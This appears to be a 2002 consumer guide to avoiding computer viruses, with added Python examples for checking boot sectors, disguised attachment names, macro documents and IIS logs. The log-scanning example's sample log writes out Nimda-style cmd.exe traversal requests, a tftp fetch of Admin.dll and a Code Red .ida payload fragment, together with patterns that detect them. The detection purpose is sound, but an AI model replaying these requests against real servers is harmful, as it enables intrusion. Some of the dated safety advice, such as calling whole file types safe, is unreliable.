AVOID VIRUS INFECTIONS
  Tips from the Geekman - Gary Goodman

OVERVIEW
This is not meant to be the definitive answer on Computer Viruses, because situations can change over time, but this should prove to be a guide and paranoia reducer. 
My intention was to present a broad lesson, as much in simple English as possible.
The point of this overview is to have enough knowledge to avoid virus infection. 
So this is a long article for a WebPage. 
If this Overview is too long or technical, you can skip to Page 2 - The Solutions, and at least practice CYA.


For the purposes of this discussion, I would like to point out three main types of viruses. 

1) A traditional virus, such as a boot sector virus or a file-infecting virus hidden in an executable program.  This is the type most resembling a biological virus: a non-living fragment of genetic code that hijacks cells in the body, turns them into virus factories, and then looks for new hosts to spread to. 

A boot sector virus is a tiny bit of code that usually arrives on a floppy disk with an infected boot sector.  Merely reading files from the disk does not transfer it; the virus runs when the computer boots (or tries to boot) with that floppy left in the drive, and at that moment it copies itself to the hard drive's boot sector or master boot record.  From there it can infect every floppy used in the machine afterwards, or wipe out the hard drive. 

It may embed itself in the boot sector code, or it may replace the boot sector code with itself and move the original boot sector to another part of the hard drive, so that it runs the moment the computer starts from that drive.  Most of these then stay resident in memory, where they can intercept disk access, infect every floppy that is inserted, and even hand back a clean-looking copy of the boot sector to any program that reads it (a "stealth" virus).  That is why virus scanners test memory first, and why a thorough scan should be done after booting from a known-clean, write-protected disk.  ("Memory" means the electronic "scratch pad" chips that the computer uses to work.  Anything in memory disappears when the power goes off.) 
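Here is what checking a boot sector for that kind of tampering looks like in practice.  This is an added example in Python, not code from the original page: it builds two constructed 512-byte master boot records, parses the standard layout (446 bytes of bootstrap code, a 64-byte table of four partition entries, then the 0x55 0xAA signature), and compares the code area against a hash recorded when the disk was known clean.  A virus that replaces the bootstrap and parks the original sector elsewhere changes the code but usually leaves the partition table alone, which is exactly the pattern the check reports.  The sector contents are made up for the demonstration.

```python
"""Parse a 512-byte master boot record (MBR) and compare it with a saved
baseline. Added example, not code from the original page. The MBR layout is
standard: 446 bytes of bootstrap code, a 64-byte table of four 16-byte
partition entries, then the 0x55 0xAA boot signature. The sectors built below
are constructed test data, not images of a real disk."""
import hashlib
import struct

SECTOR_SIZE = 512
CODE_LEN = 446           # bootstrap code area a boot-sector virus overwrites
TABLE_OFF = 446          # start of the partition table
SIG_OFF = 510            # 0x55 0xAA signature
ENTRY_FMT = "<B3sB3sII"  # boot flag, CHS start, type, CHS end, LBA start, sector count


def build_mbr(code: bytes, partitions) -> bytes:
    """Assemble a sector from bootstrap code and (boot_flag, type, lba_start, count) tuples."""
    if len(code) > CODE_LEN:
        raise ValueError("bootstrap code too long")
    table = b"".join(
        struct.pack(ENTRY_FMT, boot, b"\0\0\0", ptype, b"\0\0\0", start, count)
        for boot, ptype, start, count in partitions
    ).ljust(64, b"\0")
    return code.ljust(CODE_LEN, b"\0") + table + b"\x55\xaa"


def parse_mbr(sector: bytes) -> dict:
    """Return the SHA-256 of the code area and the in-use partition entries."""
    if len(sector) != SECTOR_SIZE:
        raise ValueError("expected exactly one 512-byte sector")
    if sector[SIG_OFF:] != b"\x55\xaa":
        raise ValueError("missing 0x55AA boot signature")
    partitions = []
    for i in range(4):
        boot, ptype, start, count = struct.unpack_from("<B3xB3xII", sector, TABLE_OFF + 16 * i)
        if ptype != 0:  # type 0 means an empty slot
            partitions.append({"slot": i, "bootable": boot == 0x80,
                               "type": ptype, "lba_start": start, "sectors": count})
    return {"code_sha256": hashlib.sha256(sector[:CODE_LEN]).hexdigest(),
            "partitions": partitions}


def check_against_baseline(sector: bytes, baseline: dict) -> list:
    """Findings relative to a baseline recorded while the disk was known clean.
    Changed code with an unchanged table is the classic infection pattern: the
    virus replaces the bootstrap and parks the original sector elsewhere."""
    now = parse_mbr(sector)
    findings = []
    if now["code_sha256"] != baseline["code_sha256"]:
        findings.append("boot code changed")
    if now["partitions"] != baseline["partitions"]:
        findings.append("partition table changed")
    return findings


# Constructed samples: a few plausible opening bytes of a DOS-era bootstrap
# (cli; xor ax,ax; mov ss,ax; mov sp,7C00h ...) and one FAT16 partition at LBA 63.
CLEAN_CODE = bytes.fromhex("fa33c08ed0bc007c8bf0")
INFECTED_CODE = bytes.fromhex("eb1c90564952555321")  # different code: a jump into its own body
PARTITIONS = [(0x80, 0x06, 63, 2096577)]

CLEAN_SECTOR = build_mbr(CLEAN_CODE, PARTITIONS)
INFECTED_SECTOR = build_mbr(INFECTED_CODE, PARTITIONS)
BASELINE = parse_mbr(CLEAN_SECTOR)   # record this while the machine is known clean


def demo() -> dict:
    """Run the check over both constructed sectors."""
    return {"clean": check_against_baseline(CLEAN_SECTOR, BASELINE),
            "infected": check_against_baseline(INFECTED_SECTOR, BASELINE)}


if __name__ == "__main__":
    # On a real machine read the sector with e.g. `dd if=/dev/sda bs=512 count=1`
    # and pass those bytes to parse_mbr(). Do it after booting from clean media:
    # a resident stealth virus can hand back a clean-looking sector otherwise.
    for name, findings in demo().items():
        print(name, "->", findings or ["no change"])
```

The baseline only means something if it was taken from a clean machine, and the comparison only means something if the read was not intercepted, so both steps belong on a boot from known-clean, write-protected media.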

An executable virus is an executable program that either is a virus or contains a virus embedded inside it.  It would have a file extension of EXE, COM, PIF or SCR.  They frequently arrive with a doubled file extension so as to appear to be a "safe" file, such as something.TXT.exe; because Windows hides the final extension by default, the recipient sees only something.TXT.  An executable virus can also launch a boot sector virus, or overwrite the boot sector or the partition table, essentially erasing the hard drive.  Note that a script virus (below) normally relies on a VBS extension hidden the same way; that extension can be unhidden by following the instructions on Page 2. 

I read about one dangerous file extension that stays hidden in Windows even when that "Hide" option is disabled:  the SHS extension (Scrap object) used by the VBS/Stages.A virus.  The subject of such an email can be one of the following:  "Life stages", "Funny" or "Jokes", with the content saying something about "The male and female stages of life".  The majority of users will see only an attachment with the harmless-looking name LIFE_STAGES.TXT.  Part of the trick here is that the attachment will open to reveal the (dumb) joke.  For this reason, I will include a special note on how to unhide that extension manually on Page 2.
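To see the doubled-extension trick concretely, here is an added example in Python (not code from the original page) that reproduces what Explorer or a mail client shows for an attachment name, with extension hiding on or off, and compares it with the extension Windows actually acts on.  The categories are the page's own (executables, scripts, macro-capable documents, the "considered-safe" list); the set of types that stay hidden even with hiding turned off (SHS, SHB, LNK, PIF, URL) reflects the NeverShowExt flag Windows puts on those registry entries; the sample names are constructed, two of them borrowed from real viruses of the period.

```python
"""Show what an attachment name looks like in Windows versus what it really is.
Added example, not code from the original page. Windows acts on the text after
the LAST dot; with "Hide file extensions for known file types" on (the default)
that part is not shown, and a few types (SHS scrap objects among them) stay
hidden even with the option off, because their registry entries carry the
NeverShowExt flag. The sample names below are constructed."""

EXECUTABLE_EXTS = {"exe", "com", "pif", "scr", "bat", "cmd"}
SCRIPT_EXTS = {"vbs", "vbe", "js", "jse", "wsf", "wsh", "shs", "shb"}  # run by Windows Script Host or the shell
MACRO_CAPABLE_EXTS = {"doc", "dot", "xls", "xlt", "ppt", "pps"}       # Office documents that can carry macros
SAFE_EXTS = {"jpg", "gif", "bmp", "avi", "mpg", "ram", "wav", "mp3", "m3u",
             "txt", "pdf", "wri", "rtf", "zip", "url", "nfo", "cfg"}   # the page's considered-safe list
NEVER_SHOW_EXTS = {"shs", "shb", "lnk", "pif", "url"}                  # hidden regardless of the folder option
KNOWN_EXTS = EXECUTABLE_EXTS | SCRIPT_EXTS | MACRO_CAPABLE_EXTS | SAFE_EXTS | NEVER_SHOW_EXTS


def true_extension(name: str) -> str:
    """The extension Windows dispatches on: whatever follows the last dot, lower-cased."""
    base = name.replace("\\", "/").rsplit("/", 1)[-1]
    return base.rsplit(".", 1)[1].lower() if "." in base else ""


def displayed_name(name: str, hide_known: bool = True) -> str:
    """Name as Explorer or a mail client's attachment line shows it."""
    ext = true_extension(name)
    if ext and (ext in NEVER_SHOW_EXTS or (hide_known and ext in KNOWN_EXTS)):
        return name[: -(len(ext) + 1)]
    return name


def classify(name: str) -> str:
    """Bucket the attachment by the extension Windows will actually use."""
    ext = true_extension(name)
    if ext in EXECUTABLE_EXTS:
        return "executable"
    if ext in SCRIPT_EXTS:
        return "script or scrap object"
    if ext in MACRO_CAPABLE_EXTS:
        return "document (may contain macros)"
    if ext in SAFE_EXTS:
        return "considered safe"
    return "unknown"


def looks_disguised(name: str) -> bool:
    """True when what the user sees ends in a safe-looking extension but the real type is not safe."""
    real = true_extension(name)
    shown = displayed_name(name)
    return shown != name and true_extension(shown) in SAFE_EXTS and real not in SAFE_EXTS


def triage(name: str) -> dict:
    """Everything a cautious user would want to know before double-clicking."""
    return {"shown": displayed_name(name), "real_extension": true_extension(name),
            "kind": classify(name), "disguised": looks_disguised(name)}


SAMPLES = [  # constructed attachment names, two of them from real 2000-era viruses
    "something.TXT.exe", "LIFE_STAGES.TXT.SHS", "LOVE-LETTER-FOR-YOU.TXT.vbs",
    "photo.jpg", "report.doc", "README",
]

if __name__ == "__main__":
    for n in SAMPLES:
        print(f"{n:30} {triage(n)}")
```

The point of `displayed_name(..., hide_known=False)` is that turning the "hide extensions" option off fixes something.TXT.exe but not LIFE_STAGES.TXT.SHS, which is why the SHS case needs the separate registry fix mentioned above.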

Some of these replace critical system files with themselves, or embed some programming code inside a file so that it runs every time the file is launched, thereby hiding.  Antivirus software can usually clean the file and remove the code, but not always.  CIH is one example of a powerful and "deadly" virus that can wipe out the hard drive and, in some cases, the BIOS chip on the system board.  I fixed this recently on someone's computer where it had taken over or replaced the system "shell", Explorer.EXE, which is what makes the Windows desktop appear and generally runs the user interface.

At this point I must disclaim that the details are quite complex, so I won't vouch for complete technical accuracy with the terminology and details, nor will I engage in irrelevant attempts at technical accuracy that would serve only to confuse the average user.  This should serve as a good general overview. 
See the disclaimer on the Tech Tips page for more information.

Executable and boot sector types are the most challenging to write: they require someone actually skilled in programming in assembly language, or at least C, and they use various schemes to hide out or even morph their own code to avoid detection.  This morphing (a polymorphic virus) is similar to how HIV, the AIDS virus, is able to defeat scientists by continually changing its outer protein structure so that antibodies and medicine cannot lock on, and the body can't keep up with its changes.

The CIH virus will attempt to write to the system BIOS (Basic Input/Output System) chip on the motherboard, but recent motherboards with a flash BIOS usually protect it in some way, so that writing to it requires getting past barriers such as code verification and human interaction, or even physically moving a jumper on the motherboard. 

Typically, people are lured into launching an executable file of this type (or booting from an untested floppy disk) by being led to believe it's a benign or "fun" program.  Many of these therefore arrive as a "Trojan Horse": a benign-looking gift with a nasty payload inside, if you know the story of the Trojan Horse. 

One partial exception is when a "script virus" (explained later) is somehow launched first and then launches another virus, or opens a hole through which a remote virus is secretly and surreptitiously installed.

A Trojan Horse would NOT arrive as a file that is not an executable: JPG, GIF or BMP pictures; AVI or MPG movies; RAM RealPlayer streams; WAV, MP3 or M3U sounds; TXT text files; PDF Adobe Acrobat files; WRI and RTF rich text documents; ZIP compressed containers (though not necessarily the ZIP's contents); and URL web links, if you're otherwise patched.  At the time of writing, all of these are considered safe to open. 
Any NFO, CFG or other file that you can view in Notepad, WordPad, MS Paint, WinZip's internal text viewer or QuickView is safe.  The caveat is that a file type is only as safe as the program that opens it, so keep those viewers patched as well (see the Windows Media Player note below).

Any program that is not an executable and cannot run a script or macro (explained later) should be considered safe; note, however, that even Windows Media Player needs to be updated and patched, because a vulnerability was discovered in that program. 

A neutral opinion on Microsoft is that by adding more and more user-friendly, gimmicky and advanced features to their software, they also add potential vulnerabilities that are discovered later.  It's a trade-off.  As some people have quipped, if you want to be 100% safe, unplug your computer and don't turn it on.

An HTML web page file could not infect you by itself, but it could try to run a dangerous script if your computer isn't updated and patched. 

This scam-style infection is fairly easy to avoid.  Don't launch an unknown program that someone sends you without at least detaching it (saving it to disk) and scanning it first.  Scan floppy disks.  Scan a CD if you think a file on it could be infected.  Chances are strong you will be safe. 

Many years ago I inserted a Windows 95 installation floppy disk at work that contained a boot virus.  According to a peer, one batch of these disks was infected at the factory when they were made; however, I have not verified this rumor.  Today, any software vendor worth their salt is safe. 

I have not heard whether a bootable CD could contain a boot sector virus, so I'll update that information later, but it sounds possible since they are created from bootable floppy disks; scan them if you suspect one. 

These traditional viruses seem less prevalent now because 
a) people don't use floppies as often, and 
b) they require advanced programming skills that most "script kiddies" don't possess (and I don't currently possess either).



2)  A worm, such as Code Red and Nimda of 2001.  Some versions of Nimda also spread through a security hole in Internet Explorer (the IFRAME/MIME exploit, which makes IE run an email attachment automatically).  They show up on antivirus scanners as W32 types, like W32.Nimda.A@mm.  Nimda's primary trick involved security holes in Microsoft's Internet Information Services (IIS), which ships both as a "mini" personal web server and as a full-fledged web server, plus that MIME exploit. 
Known vulnerabilities have been corrected by free patches and updates from Microsoft. 

Once the IIS web service was hijacked, the worm would use that computer to quietly launch probes looking for more victims.  If the server actually served web pages, the worm appended a small script to them, so anyone viewing those pages with an unpatched browser could be infected as well.  Many real web servers were fixed before they were compromised, but across the whole world many were missed.  Nimda also opened every hard drive as a network share with full access and enabled the Guest account, and some versions reported information back to a remote computer, opening up a security hole for other infections and exploits.  It was actually a very interesting and creative monster.
 


Here's one related tip: Nimda also used TFTP (Trivial File Transfer Protocol) to pull its own code onto each server it had just broken into, and TFTP is not needed on a desktop (people use FTP, not TFTP).  So search your hard drive for *TFTP*.* and delete TFTP.EXE (both copies, if you find two).  It will stay in your Recycle Bin for a while anyhow, but trust me, you don't need it. 

Nimda would also probe for shared folders with full read-write access.  If the shared folder was the "root" of the hard drive [C:] and had no security configured, any computer that could reach that network could write to the entire hard drive.  If the shared folder was directly reachable over the Internet, it was an easy target. 

Web servers are inherently exposed: they accept requests from anonymous users, so they are insecure unless locked down and monitored by a knowledgeable system administrator.  Microsoft had released security updates to fix the vulnerabilities, but not everyone was diligent enough to apply them in time. 

Laptops at work were running demos of monitoring software that reported manufacturing data in real time, and that software required IIS (Internet Information Server) to work.  The (often remotely located) sales people were not systems administrators, so their laptops did not get patched or updated.  As you can imagine....

These worms required no interaction from the user to launch -- it was lack of diligent interaction that caused the problem to multiply.
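As an added example (not code from the original page), here is the kind of check an administrator could run over IIS logs to see whether these worms had been knocking on a server.  It undoes the Unicode and double-encoded ".." tricks the worms used to reach cmd.exe through the web root, and flags the root.exe, cmd.exe, default.ida and TFTP requests they were known to make.  The log lines are constructed, and the field order assumes the W3C extended format with date, time, client IP, method, URI stem, query and status.

```python
"""Spot Code Red / Nimda-style probes in IIS W3C log lines. Added example, not
code from the original page. The request patterns are the ones those worms
left in web server logs (root.exe and cmd.exe probes through Unicode or
double-encoded '..' traversal, the Code Red default.ida overflow, and Nimda
pulling Admin.dll with TFTP); the log lines below are constructed, and the
field order (date time c-ip cs-method cs-uri-stem cs-uri-query sc-status) is
an assumed W3C extended format."""
import urllib.parse
from collections import Counter

# Overlong UTF-8 sequences that IIS decoded into path separators only after
# its directory-traversal check had already passed.
OVERLONG = {"%c0%af": "/", "%c0%2f": "/", "%c1%9c": "\\", "%c1%1c": "\\"}


def normalize(text: str) -> str:
    """Undo the encoding tricks so '..' and cmd.exe are visible as plain text."""
    t = text.lower()
    for enc, ch in OVERLONG.items():
        t = t.replace(enc, ch)
    t = urllib.parse.unquote(urllib.parse.unquote(t))  # twice: %255c -> %5c -> '\'
    return t.replace("\\", "/")


def classify_request(stem: str, query: str):
    """Name the worm behaviour a request matches, or None for ordinary traffic."""
    s, q = normalize(stem), normalize(query)
    if s.endswith("/root.exe"):
        return "Code Red II backdoor probe (root.exe)"
    if "cmd.exe" in s and ("/../" in s or "/winnt/system32/" in s):
        if "tftp" in q and "admin.dll" in q:
            return "Nimda TFTP fetch of Admin.dll"
        return "cmd.exe reached through a web path"
    if s.endswith("/default.ida") and "%u" in query.lower():
        return "Code Red .ida buffer overflow"
    return None


def scan(lines) -> list:
    """Parse log lines and return one finding per matching request."""
    findings = []
    for line in lines:
        if not line.strip() or line.startswith("#"):  # blank or W3C header line
            continue
        fields = line.split()
        if len(fields) < 7:
            continue
        date, time, ip, method, stem, query, status = fields[:7]
        rule = classify_request(stem, query)
        if rule:
            findings.append({"time": f"{date} {time}", "ip": ip, "method": method,
                             "stem": stem, "status": status, "rule": rule})
    return findings


def attackers(findings) -> dict:
    """Hits per source address; a probing worm shows up as one IP firing many rules."""
    return dict(Counter(f["ip"] for f in findings))


# Constructed log excerpt: one infected host (10.0.0.5) running the Nimda probe
# sequence, one Code Red source (10.0.0.9), and one ordinary visitor.
SAMPLE_LOG = r"""#Fields: date time c-ip cs-method cs-uri-stem cs-uri-query sc-status
2001-09-18 10:01:12 10.0.0.5 GET /scripts/root.exe /c+dir 404
2001-09-18 10:01:13 10.0.0.5 GET /MSADC/root.exe /c+dir 404
2001-09-18 10:01:14 10.0.0.5 GET /c/winnt/system32/cmd.exe /c+dir 404
2001-09-18 10:01:15 10.0.0.5 GET /scripts/..%255c../winnt/system32/cmd.exe /c+dir 200
2001-09-18 10:01:16 10.0.0.5 GET /scripts/..%c1%1c../winnt/system32/cmd.exe /c+tftp%20-i%2010.0.0.5%20GET%20Admin.dll%20c:\Admin.dll 200
2001-09-18 10:02:00 10.0.0.9 GET /default.ida NNNNNNNNNNNNNNNNNNNNNNNN%u9090%u6858%ucbd3%u7801 200
2001-09-18 10:03:00 10.0.0.7 GET /index.html - 200
"""

if __name__ == "__main__":
    results = scan(SAMPLE_LOG.splitlines())
    for f in results:
        print(f["time"], f["ip"], f["status"], f["rule"])
    print("per source:", attackers(results))
```

A 200 status on a cmd.exe or tftp line is the one to worry about: it means the request reached the program, while the 404s are the probe failing against a patched or non-existent path.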



3)  A script or macro virus is not a traditional "virus" per se, but it does exploit Windows and take over your computer.  These are the most common now, because they are relatively easy to write.  Internet Explorer, Outlook and Outlook Express all allow some scripts to run by default.  The system is supposed to prevent anything powerful enough to break your system from running without your express permission; these viruses get through where that barrier has a hole, or where the user waves them through.
 
Here's some more technical info, drawing on what Windows 2000 Help says about scripting:

Many websites serving standard HTML also embed some form of scripting, legitimately and beneficially.  Web-based scripting is supposed to be restricted to doing only "web-related" things, such as displaying a page.  JavaScript, JScript and Visual Basic Script embedded in a web page (or email) are supposed to be restricted so that they cannot get at anything harmful. 

So, here's another quick tip:  if you're not in a corporate environment, go to Add/Remove Programs in the Control Panel, choose the [Windows Setup] tab (Windows 95/98/Me), and remove Windows Script Host if it's installed.  Web pages will still run their safe, restricted scripts inside the browser, but if you or someone else accidentally launches a .VBS or .JS script file, there will be nothing on the machine to run it. 

Similarly, Microsoft Office applications can run macro code to improve productivity.  That's just fairly simple Visual Basic code embedded in a document.  I have created macros in Microsoft Word and Excel for myself, for instance to apply a color to a cell, or to open a specific document via a key combination or a custom button.  A macro can be written to do more powerful and harmful things too.  Unfortunately, the computer by itself is too dumb to know whether a macro embedded in a document is friendly or fatal; it only knows that one exists (and only tells you if macro warnings are enabled). 
TIP: If a Word document you receive in email can be detached and viewed in QuickView or opened in WordPad, neither of those programs can run macros.  Neither can Notepad, if you can force the file to open in Notepad. 
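Since the computer can at least tell that a macro project exists, here is an added example in Python (not code from the original page) of that check, to run on a detached document before anything opens it.  A Word or Excel binary document is an OLE compound file, and a VBA project leaves recognisable stream and storage names in it; looking for those names in the raw bytes is a quick triage that says a macro is present, not whether it is friendly.  The three sample documents are constructed byte strings that mimic only the parts the check looks at; for real work a proper OLE parser such as the oletools `olevba` utility is the right tool.

```python
"""Heuristic check for a VBA macro project inside a Word or Excel binary
document. Added example, not code from the original page. A .doc/.xls file
is an OLE compound file (it starts with the bytes D0 CF 11 E0 A1 B1 1A E1);
a macro project lives under a storage named 'Macros' (Word) or
'_VBA_PROJECT_CUR' (Excel) and always includes a '_VBA_PROJECT' stream, with
the names kept as UTF-16LE in the file's directory. Scanning for those names
reports that a macro EXISTS, nothing more. The sample documents below are
constructed byte strings, not real files."""

OLE_MAGIC = bytes.fromhex("d0cf11e0a1b11ae1")

# '_VBA_PROJECT' is the decisive marker; 'Macros' is supporting evidence only,
# since that word could also occur as ordinary document text. Excel's
# '_VBA_PROJECT_CUR' contains the decisive marker, so it needs no entry.
MACRO_MARKERS = {name: name.encode("utf-16-le") for name in ("_VBA_PROJECT", "Macros")}


def is_ole(data: bytes) -> bool:
    """True for the compound-file format that .doc/.xls/.ppt binaries use."""
    return data[:8] == OLE_MAGIC


def macro_markers_found(data: bytes) -> list:
    """Directory-entry names (as UTF-16LE) that point to a VBA project."""
    return [name for name, raw in MACRO_MARKERS.items() if raw in data]


def macro_status(data: bytes) -> str:
    """Plain-language verdict for a file read from disk."""
    if not is_ole(data):
        return "not an OLE document (plain text, RTF or another format)"
    if "_VBA_PROJECT" in macro_markers_found(data):
        return "OLE document WITH a VBA macro project"
    return "OLE document, no macro project found"


def _fake_ole(*stream_names: str) -> bytes:
    """Constructed stand-in for a compound file: header magic, padding, then
    directory names encoded the way real files encode them."""
    body = b"".join(n.encode("utf-16-le") + b"\0\0" for n in stream_names)
    return OLE_MAGIC + b"\0" * 504 + body


PLAIN_DOC = _fake_ole("Root Entry", "WordDocument", "1Table", "SummaryInformation")
MACRO_DOC = _fake_ole("Root Entry", "WordDocument", "1Table",
                      "Macros", "VBA", "_VBA_PROJECT", "ThisDocument")
RTF_DOC = b"{\\rtf1\\ansi Hello}"


def triage_all() -> dict:
    """Run the check over the three constructed samples."""
    return {"plain.doc": macro_status(PLAIN_DOC),
            "macro.doc": macro_status(MACRO_DOC),
            "memo.rtf": macro_status(RTF_DOC)}


if __name__ == "__main__":
    # For a real attachment: with open(path, "rb") as f: print(macro_status(f.read()))
    for name, verdict in triage_all().items():
        print(f"{name:10} {verdict}")
```

A document that comes back "WITH a VBA macro project" is one to open in WordPad or QuickView, as the tip above says, or not at all; one that comes back clean still deserves a virus scan, because the check only looks for the macro container.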

So the most common issues are three-fold: 
a) system weakness: scripts and other exploits that work through holes in the barriers; 
b) default settings: settings that allow email to run unsafe scripting; and 
c) scams, or Trojan Horses: people choosing to run a script or launch an untested Office document because an email lured them to do so. 

The most common is the scam method -- social engineering -- getting the recipient to launch the attachment.  The "I Love You" virus thrived on innocence or gullibility, and on insufficient technical knowledge to recognize the danger of launching an attachment named LOVE-LETTER-FOR-YOU.TXT.vbs (a script, shown as a harmless-looking .TXT file when extensions are hidden) with no leading information (just a 'come on').  But that's not qualitatively different from any other non-computer scam. 
 

A couple of these scam viruses are worth mentioning, due to their cleverness:

As system weaknesses and security holes are discovered or reported, Microsoft makes corrections and releases fixes, but it seems that the average person rarely applies them and ignores the Windows Update icon in the Start menu.  Microsoft and other parties also publish suggestions on the Web for changing default settings (typically wide open for maximum convenience) to get more security. 


In conclusion (of this overview), it is fairly simple to avoid most of these types of infections, by 
a) applying patches promptly (left unpatched, many of these viruses require no more interaction than opening an email), 
b) locking down email settings, and 
c) not manually launching unknown files of the types that can contain malicious code.

On the other hand, your computer experience might be hampered if you are afraid to launch any kind of file, even a legitimate download from a legitimate website that writes software.  If you are uninformed, you might fear a free program like SetTime (http://www.p-squared.com) by Pete Pinter, which updates my clock to match a Navy time server, yet install a program like Gator or AudioGalaxy (which are not viruses, but are a form of "surfing spyware").  You might delete all email with attachments without cause, but leave your default email settings vulnerable.
 



Gary Goodman
330 733 3518
Geekman1@Geekman1.com
http://www.geekman1.com/
12-03-2002
 